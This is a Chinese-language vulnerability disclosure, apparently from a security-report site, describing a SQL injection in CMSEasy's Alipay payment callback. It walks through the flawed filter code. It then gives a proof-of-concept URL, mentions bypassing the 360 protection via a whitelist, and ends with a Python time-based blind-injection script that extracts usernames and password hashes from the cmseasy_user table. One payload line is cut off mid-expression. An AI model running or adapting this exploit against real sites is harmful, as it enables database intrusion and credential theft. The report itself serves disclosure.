### 简要描述:
也不知道重复没有- -!
### 详细说明:
/lib/default/archive_act.php:
```
function respond_action() {
include_once ROOT . '/lib/plugins/pay/' . front::$get['code'] . '.php';
$payclassname = front::$get['code'];
$payobj = new $payclassname();
$uri = $_SERVER["REQUEST_URI"];
$__uriget = strstr($uri, '?');
$__uriget = str_replace('?', '', $__uriget);
$__uriget = explode('&', $__uriget);
$_GET = array();
foreach ($__uriget as $key => $val) {
$tmp = explode('=', $val);
$_GET[$tmp[0]] = $tmp[1];
if(preg_match('/\'|select|union|"/i', $tmp1)){
exit('非法参数');
}
}
file_put_contents('logs11.txt', var_export($_GET,true));
$status = $payobj->respond();
```
由于程序员的失误导致$tmp1的过滤并没有起到作用,同时由于前面会对code进行过滤
继续跟到alipay.php:
```
function respond() {
if (!empty($_POST)) {
foreach($_POST as $key =>$data) {
if(preg_match('/(=||\')/', $data)){
return false;
}
$_GET[$key] = $data;
}
}
$payment = pay::get_payment($_GET['code']);
```
看看get_payment().
```
public static function get_payment($code) {
$where=array();
$where['pay_code']=$code;
$where['enabled']=1;
$payment1=pay::getInstance()->getrows($where);//注入
$payment = $payment1[0];
if ($payment) {
$config_list = unserialize($payment['pay_config']);
foreach ($config_list AS $config) {
$payment[$config['name']] = $config['value'];
}
}
return $payment;
}
```
由于cmseasy使用了360防护,但是可以基于白名单绕过,如下
poc:
```
http://localhost/cmseasy/uploads/index.php/?case=file&case=archive&act=respond&code=alipay'
```
无法使用"=",写个脚本跑一下
exp:
```
import urllib2
from time import time
def inject(payload):
url = 'http://localhost/cmseasy/uploads/index.php/?case=file&case=archive&act=respond&code=alipay'
req = urllib2.Request(url+payload)
start = time()
response = urllib2.urlopen(req)
end = time()
index = int(end-start)
return index
wordlist = "123456789:;Abcdefghijklmnopqrstuvwxyz{"
def user_pass():
result = ""
for i in range(1,40):
for num in range(len(wordlist)):
word = ord(wordlist[num])
times = inject("'/**/and/**/IF(ord(substring((select/**/concat(username,0x3a,password)/**/from/**/cmseasy_user),{0},1))
if times>1:
print str(i)+'<=========>'+chr(word-1)
result = result+chr(word-1)
break
print 'username:password<=========>'+result
user_pass()
```
### 漏洞证明:
[
](https://images.seebug.org/upload/201409/01163237024ba1aa20cdba85abbd1facb01e7de6.jpg)
271
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
